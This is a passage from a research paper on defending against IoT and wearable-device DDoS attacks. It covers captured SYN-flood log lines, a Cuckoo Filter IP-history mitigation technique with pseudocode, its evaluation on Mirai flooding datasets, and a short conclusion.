8842	11.364184470	rt156bb44-46-107.ro.	172.30.1.1	TCP	74	26368 → 80 [SYN] Seq=0 Win=4096 Len=0 MSS=1430 SACK_PERM=1 TSval=1840537518 TSecr=0 WS=1
8841	11.364174941	48.33.250.224	172.30.1.1	TCP	74	24697 → 80 [SYN] Seq=0 Win=4096 Len=0 WS=1024 MSS=265 TSval=1061109567 TSecr=0

8(b)

8(c)

Figure 8. BoNeSi attack method, Wireshark logs, and Related Graph using TCP Packets

6. EVALUATION AND RESULTS OF PROPOSED DDoS ATTACK MITIGATION TECHNIQUE

In the first step of designing the CF, we created a dataset based on the signature of IP address history from the daily traffic. The signature of the IP address's frequency, size of

the packet, and port number are created. A complete Three-Way handshake is not possible by a spoofed IP address, so those TCP traffic IP address which have a successful TCP handshake are considered as the benign IP addresses. To create a more reliable signature-based IP address history, for UDP traffic we ignored those incoming UDP packets that just send a single

packet in a day. In the second step created the CF using this dataset. CF is initialized and the hash function is applied to the element that needs to be added to the bit array. To evaluate the proposed Cuckoo Filter based mitigation technique, we used two different data sets, IoT network intrusion dataset [33] and DDoS evaluation dataset (CICDDoS2019) [34]. Using Wireshark we converted all .pcap files to a .csv file from the mentioned two data sets. This CSV file contains multiple columns of data with different header types, such as number, time, source, destination, protocol, length, etc. We used a CPP program [35] to convert this .csvfile to a .txt file which helps to select the required data such as source IP addresses, port numbers, etc.

6.1 Datasets

6.1.1 IoT network intrusion dataset [33], is created by authors in an IoT environment for academic purposes. Captured exploiting a wireless network-adaptor in monitor mode at various times. The data collected includes 42 raw network-packets in pcap form. All the packets are captured using tools such as Nmap except Mirai malware packets, while simulating attacks. A laptop is used to generate Mirai malware-packets and later manipulated as if originated by IoT devices.

6.1.2 DDoS evaluation dataset (CIC-DDoS2019) [34], the data collected is in pcap form which consists of genuine and also some major upto date DDoS attacks. This dataset collects the raw-data and network-traffic each day in pcap form and organizes each day data. Event logs per machine for Ubuntu is also collected. The algorithm of the proposed Cuckoo Filter is

explained below.

```
Creates a filter , cuckooFilterNew(filter,
maxKeyCount, maxKickAttempts, seed);

add IP Address to the filter ,cuckooFilterAdd(filter,
IPAddress, IPAddLengthInBytes);

Check if filter contains the IP address already, If
(cuckooFilterContains(filter, IPAddress,
IPAddLengthInBytes)) then block else add the IP
address to filter.

Finally free the filter cuckooFilterFree(filter);
```

6.2 Results

The three basic operations supported by CF are Add, Delete, and Lookup. We created CF by adding the benign IP addresses collected from the IP history and the benign data from the used datasets. For testing purposes, we used the malicious data packets, such as Mirai-UDP flooding & Mirai-HTTP flooding from the mentioned datasets as listed in Table 2. Figure 10, 11 , 12 and 13 shows the output of the proposed CF mitigation technique with false-positive ϵ value 0.001.

Table 2. Number of total packets used for test and number number of packets not found in Cuckoo filter

Attack types	Total packets	Blocked packets
Mirai UDP flooding	417864	2292
Mirai HTTP flooding	367880	4641

Figure 14. Total Number of Added and Blocked IP's

Figure 14 shows the number of allowed data packets and the number of filtered or blocked data packets by Cuckoo Filter. If repeated access requests are received from the added data then that data is blocked or deleted from further communication with the requested device.

7. CONCLUSION

Most of the IoT-devices connected to the internet continuously are poorly secured and use default username and password for login this attracts many attackers to perform malicious activities. Wearable devices are being used by many individual users and are gaining popularity day by day. Wearable-devices are being used in various applications as health care appliances, smart-homes, security, gaming, and entertainment, etc. These wearable devices are creating a new platform for malicious activities. Our research work showed the possibilities of deploying wearable devices in DDoS attacks, using the BoNeSi DDoS botnet simulator. We used the IP based flood attacks and our Cuckoo Filter-based DDoS mitigation technique. There is huge scope to expand the same experiment by using Bluetooth or NFC based connections.

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